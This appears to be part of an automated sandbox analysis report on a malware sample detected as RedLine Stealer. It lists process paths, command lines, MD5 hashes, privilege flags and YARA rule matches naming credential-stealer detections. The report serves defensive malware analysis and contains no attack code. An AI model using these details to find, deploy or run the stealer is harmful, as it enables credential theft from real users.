                                                                                                  Path:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe"
                                                                                                  Imagebase:0xc70000
                                                                                                  File size:4'685'824 bytes
                                                                                                  MD5 hash:5F154DAEB258032876C628F5A9674018
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1841742804.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000000.1664106626.0000000000C72000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:09:38:02
                                                                                                  Start date:19/02/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >